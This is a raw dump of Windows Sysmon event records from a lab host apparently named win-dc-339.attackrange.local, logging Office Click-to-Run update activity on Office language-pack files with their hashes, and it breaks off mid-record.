14:55:16.564{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PROTTPLN.XLSMD5=9BFF69AA98FE3E0D7EAD3622F4E67B34,SHA256=DF0B742B3B70F19D3413C1827925B5EB207997CBEC14A8D8AA9A38400433C195,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068486Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:16.564{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PROTTPLN.PPTMD5=869F9133110546C95F112B850A33F98A,SHA256=8E3385E40B72D42DE5564395B005C12680D0722D82C1B35C9213E6BF7368AF1A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068485Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:16.564{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PROTTPLN.DOCMD5=DE8AD0E10036055D807C48C6E212D525,SHA256=1EA89436BA65E17751325F9B1F80D68F32B02C0B257D74295EF9914D2608AA92,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068484Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:16.564{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PROTOCOLHANDLERINTL.DLLMD5=339182A0BB786419360CA48BAF9EAF6F,SHA256=FE34F7B5E886198B6EAB2EC24E94B4C728671F3B5D2785E8DB7917ED755CCC4D,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000068483Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:16.564{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PREVIEWTEMPLATE2.POTXMD5=B564DA809C4364F1AF7320D5E15CDC5F,SHA256=3618286B339098B71B71D7448DB235968C4B514240BAB408F597754D48F5AE3A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068482Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:16.564{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PREVIEWTEMPLATE.POTXMD5=86EC47D3E3B7AE5BA4A1582B27911880,SHA256=4AA03B1A884735219C62A9F3D722A148791AC6BEFC943677911272B53A475FFD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068481Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:16.548{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PPT_WHATSNEW.XMLMD5=86587E78DC84C527BA10A6BEC88C418B,SHA256=17B2C82B33FC9DD13760051281E8C3D408898224E5CE9DA04183403790CD2FC3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068480Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:16.548{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PPINTL.DLLMD5=025E614ADE1D0D6B6734C47AB8334BFC,SHA256=1621EDD56F3D58268366A1DF19367B23036DC65F3EC386C5E571D879C29469D5,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000068479Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:16.548{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PowerPointNaiveBayesCommandRanker.txtMD5=79B0D51D422735FCFCC758A0127604A6,SHA256=733C2462C603A84E9BA158E8843E428357C95B24C846B683A66D58D2088932C0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068478Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:16.533{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\POWERPNT_K_COL.HXKMD5=DB9742E49C49C505B293A84518E95FA5,SHA256=1C17B95E5098ADB0C0E06AAC8A8C7C50C6A5EF1B696465D548C8A922F1D3A653,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068477Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:16.533{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\POWERPNT_F_COL.HXKMD5=B8FBBC73DDDE31636552AB184B4E398F,SHA256=3C3702253A4695B5BCB18A2565B1D49F9F32F5F9F2442FD1395197970FA34EDB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068476Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:16.533{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\POWERPNT_COL.HXTMD5=3A52DE047D175CB31C704DB04EFCE59A,SHA256=0857DE352EF344B436B20EBBF54ACB2B0CB6FFE1831923E0652F010450B8B13A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068475Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:16.517{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\POWERPNT_COL.HXCMD5=8B57C5496B5C82D93D9095AA1E6A74B5,SHA256=3C552ECC4C46F9B612CC1D02327248E5279284770C69FE261D2BB48BC025DB94,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068474Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:16.517{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\POWERPNT.HXSMD5=C4A3BE4484451A087543568F3C5225EA,SHA256=21410F7A91B80A417749C5BC4A79348DD8B7B2F6C3D536CFC550538400AA7BBE,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000068473Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:16.517{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\OUTLWVW.DLLMD5=5EF9518C82D170EF6842D220E35940AD,SHA256=171F545BD853C636871FDE9212E8D4587ED0291E86CD59060E4569BF193C2E64,IMPHASH=31BCBD80AFE6E497045844053D47B8F2truetrue 23542300x800000000000000068472Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:16.517{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\OUTLPERF.INIMD5=509A7197AE66401D1DA76F4BAC1DD0A8,SHA256=EE9E288C3495FD548FD49095BE08807F215FC0780064E179011098C0C7461A34,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068471Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:16.517{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\OUTLPERF.HMD5=BC71FF7DA14ECA943FA0AD815F72B8CB,SHA256=48E537902C03A3EEE4790FC97EE072CDDC7C1A90122702DD18243D8C12A0D99A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068470Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:16.501{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\OUTLOOK_WHATSNEW.XMLMD5=3AC3DAD8B764D3CEF8B69B81E00100B7,SHA256=F56BA2C1361DD8262AF35B07EDDDC7BEA668549F01673B9D0F32F1AFDFD4C0D9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068469Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:16.501{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\OUTLOOK_K_COL.HXKMD5=DB9742E49C49C505B293A84518E95FA5,SHA256=1C17B95E5098ADB0C0E06AAC8A8C7C50C6A5EF1B696465D548C8A922F1D3A653,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068468Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:16.501{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\OUTLOOK_F_COL.HXKMD5=B8FBBC73DDDE31636552AB184B4E398F,SHA256=3C3702253A4695B5BCB18A2565B1D49F9F32F5F9F2442FD1395197970FA34EDB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068467Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:16.501{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\OUTLOOK_COL.HXTMD5=1F12EBFF96E17BD71FC7AC56835B3B68,SHA256=FF1A99BDA69B78AA12A40B1355A9EDE20A4098A11F86377D44C68C4CC7275AF4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068466Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:16.501{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\OUTLOOK_COL.HXCMD5=77B0699804754EEEF89B478237ACE897,SHA256=CF5E1BFB9CE5CC47E3C47F9A48C926FEB978278D0F2ABF0CE6BFED0C8B0247B1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068465Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:16.501{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\OutlookTaskNaiveBayesCommandRanker.txtMD5=AE761565DE8CA200D77CAC9320338E1C,SHA256=3F895FFA1074DC9D23241AEC1F59C3079402ED8073A36293E63D69BBF2FEACC6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068464Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:16.501{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\OutlookNaiveBayesCommandRanker.txtMD5=955B6AF4A76106A03ED3F238BF60F337,SHA256=1C13620DDD454AC69599BC3563DAE1AC4CC2BEA36A21F771A5C9D13A7234469C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068463Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:16.486{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\OutlookMeetingReqSendNaiveBayesCommandRanker.txtMD5=E02AC4CA7CAA8C78BCF0362F40EAF7DB,SHA256=BFF98559F238D676907A2C204B564C2173AA6AED27FE67DBA7DA2B5E98C3740C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068462Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:16.486{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\OutlookMeetingReqReadNaiveBayesCommandRanker.txtMD5=E3220C76E59ECA9DDF5640FBFF85F99A,SHA256=A83E690A13E228EE160036B752969DA954320A0982374AF90B282C416828D414,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068461Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:16.486{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\OutlookMailReadNaiveBayesCommandRanker.txtMD5=E4EEDD7F205DCB72340408552D361E82,SHA256=DBE2BF920FEFDE1787CA8C86679B5C96225DAB740D36CD7C4C387758EE6066BF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068460Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:16.486{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\OutlookMailNaiveBayesCommandRanker.txtMD5=93B47E8215C796190E5D20FF4C11A8D9,SHA256=E0E8241825580F5B7B96166840FEFA547AB1143F7BE9F61E70160A6BD956509B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068459Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:16.470{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\OutlookApptNaiveBayesCommandRanker.txtMD5=575A512D9E4B28078D6C91A6F7DA2DB6,SHA256=5DC62486665C33962C4949061871E2402F7DF220FEDD83AF244EAFBE75F5B85B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068458Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:16.470{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\OutlookAddrNaiveBayesCommandRanker.txtMD5=FF859EF5C417C25C3EDF27D61882FE0A,SHA256=8016E088E09B094942B4BD134F0A51BB2676AA31E89B83F92C96270BD435527C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068457Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:16.470{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\OUTLOOK.HXSMD5=6E74597327DA43D715B4A19DE3278694,SHA256=D2BDCE15B7781E7D9B4EAD907D6F07A7FFDBEC938343B0C9834254FC9D5ED040,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000068456Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:16.455{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\OUTLOOK.HOLMD5=20BF092998CFBC5FC532E843176BAC27,SHA256=9E4D52647F2C9E8CB4EBDB505BA09235E559B219F471AB45AD6C6BB721911337,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068455Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:16.439{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\OUTLLIBR.DLLMD5=2745710016E34905ADF7A547760B9739,SHA256=ACF132D633A82E4F04FBCBEDEF3ACF2DFD8D26E53E268E32105AFC28E82A44A5,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000068454Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:16.408{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\OUTFORM.DATMD5=5D512E3AFA69A20E09ECA14162F867CC,SHA256=4E8D7D8866B8D61EC92FD312E334C1A9558F8A88A4B793DD84E8B15262B685F9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068453Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:16.408{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\ospintl.dllMD5=32D4C1A72F53134F69AE0526AA113FF8,SHA256=C563A691F0CBB479DC77B995F6793F0DBBB12644B458204588BB67AFB5E8E374,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000068452Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:16.408{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\ORGCINTL.DLLMD5=22061C20B45C0026E5C92A8D65612BC5,SHA256=89E17B2ECDE11B3D618847136EC586AC50DA6BB02D73A1B9C86F33C7EAD13CD8,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000068451Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:16.408{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\ORGCHART.CHMMD5=18950E798222B3439C5FD06FD754511E,SHA256=79FAF6639F0389BC70F4D78BEAB03B7C8DF30D7A330CCD386C5679E1A0431AFB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068450Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:16.408{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\ONINTL.DLLMD5=8413613C598B6A846B243F069AA618D5,SHA256=12CA399C8D68732F621B5971A81F0529AA5045DF22262D41FC146454CCBF5FE6,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000068449Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:16.408{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\ONGuide.onepkgMD5=463C7EDF20A0F2BB52D65B156E5D6343,SHA256=37C69116B82A65694BD0518B6730A9B1CB8024479B8ED3486CF342C313DB8D3E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068448Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:16.392{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\ONENOTE_WHATSNEW.XMLMD5=33610EAAA1F397E7E8C9A82DB14126D6,SHA256=6C2EFEA710264B9443ACA11926A3123B289336BA2C4E333350185C38023B1D10,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068447Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:16.392{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\ONENOTE_K_COL.HXKMD5=DB9742E49C49C505B293A84518E95FA5,SHA256=1C17B95E5098ADB0C0E06AAC8A8C7C50C6A5EF1B696465D548C8A922F1D3A653,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068446Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:16.392{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\ONENOTE_F_COL.HXKMD5=B8FBBC73DDDE31636552AB184B4E398F,SHA256=3C3702253A4695B5BCB18A2565B1D49F9F32F5F9F2442FD1395197970FA34EDB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068445Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:16.392{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\ONENOTE_COL.HXTMD5=CF2F7BC27D3347765F403C9CE29F1694,SHA256=A6200C12607B90230BDA67F133DFEA0DB8756DBEE1FC0D4C4C96DA6FE0757ACC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068444Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:16.392{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\ONENOTE_COL.HXCMD5=4DE1721AEBC8F9E37BDFF1F360E08E2D,SHA256=AE72FC738D036D36B785D1D67FBE3836AE59BCEC97E3BDC57B92760B8E0EE5E3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068443Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:16.392{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\ONENOTE.HXSMD5=53456BB00AABC3213260BC2605F48CB9,SHA256=BE94BDC35239779EA6BC246A50B6F733727D001B888211BDD1B2379BACA438BA,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000068442Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 